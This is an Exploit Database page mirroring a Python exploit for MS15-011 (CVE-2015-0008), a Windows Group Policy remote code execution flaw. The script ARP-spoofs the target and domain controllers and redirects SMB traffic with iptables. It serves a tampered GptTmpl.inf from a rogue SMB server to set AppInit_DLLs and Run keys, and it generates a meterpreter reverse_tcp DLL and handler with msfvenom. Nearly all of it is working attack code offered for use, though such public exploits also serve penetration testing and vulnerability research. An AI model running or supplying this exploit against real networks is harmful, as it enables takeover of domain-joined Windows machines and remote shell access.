Microsoft Windows Server 2012 – ‘Group Policy’ Remote Code Execution (MS15-011)

• Exploit Database
• 15 阅读

• 作者： Thomas Zuk
  日期： 2019-10-29
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47558/

• # Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
  # Date: 2019-10-28
  # Exploit Author: Thomas Zuk
  # Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, 
  # Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
  # Tested on: Windows 7 , Windows Server 2012
  # CVE : CVE-2015-0008
  # Type: Remote
  # Platform: Windows
  
  # Description: While there exists multiple advisories for the vulnerability and video demos of 
  # successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code 
  # targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level 
  # remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).
  
  #!/usr/bin/python3
  
  import argparse
  import os
  import subprocess
  import socket
  import fcntl
  import struct
  
  # MS15-011 Exploit.
  # For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
  # Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
  # Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
  # Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.
  
  def arpSpoof(interface, hostIP, targetIP):
  arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
  arpArgs = arpCmd.split()
  print("Arpspoofing: %s" % (arpArgs))
  p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
  
  
  def karmaSMB(hostIP):
  print("reverting GptTmpl.inf from bak")
  os.system("cp GptTmpl.inf.bak GptTmpl.inf")
  appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
  CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
  f = open("GptTmpl.inf","a", encoding='utf-16le')
  f.write(appInit)
  f.write(CURunKey)
  f.close()
  
  path = os.getcwd()
  
  fConfig = open("smb.conf","w")
  fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
  fConfig.close()
  
  karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
  os.system(karmaCmd)
  
  
  def iptables_config(targetIP, hostIP):
  print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
  print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
  print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
  print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
  os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
  os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
  os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
  os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')
  
  
  def get_interface_address(ifname):
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])
  
  def generatePayload(lhost, lport):
  print("generating payload(s) and metasploit resource file")
  msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
  os.system(msfDll)
  msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
  print("metasploit resource script: %s" % msfResource)
  print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
  
  file = open("meta_resource.rc", "w+")
  file.write(msfResource)
  file.close()
  
  
  
  if __name__ == '__main__':
  
  parser = argparse.ArgumentParser()
  
  # Add arguments
  parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
  parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
  parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
  parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
  parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)
  
  args = parser.parse_args()
  
  # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
  print ("checking for missing file(s)")
  if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
  print("Requirements missing. Downloading required files from github")
  os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
  os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")
  
  # Get the provided interfaces IP address
  ipAddr = get_interface_address(args.interface)
  
  if args.lhost is not None:
  lhost = args.lhost
  else:
  lhost = ipAddr
  
  if args.lport is not None:
  lport = args.lport
  else:
  lport = '4444'
  
  
  dcSpoof = ""
  dcCommaList = ""
  count = 0
  
  # loop over the domain controllers, poison each and target the host IP
  # create a comma separated list of DC's
  # create a "-t" separate list of DC's for use with arpspoof
  for dc in args.domain_controller:
  dcSpoof += "-t %s " % (dc)
  if count > 0: 
  dcCommaList += ",%s" % (dc)
  else:
  dcCommaList += "%s" % (dc)
  
  arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
  count += 1
  
  # arpspoof the target and all of the DC's
  arpSpoof(args.interface, args.target_ip, dcSpoof)
  
  # generate payloads
  generatePayload(lhost, lport)
  
  # Setup iptables forwarding rules
  iptables_config(args.target_ip, ipAddr)
  
  #run Karmba SMB Server
  karmaSMB(ipAddr)
   
  
  print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
  print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")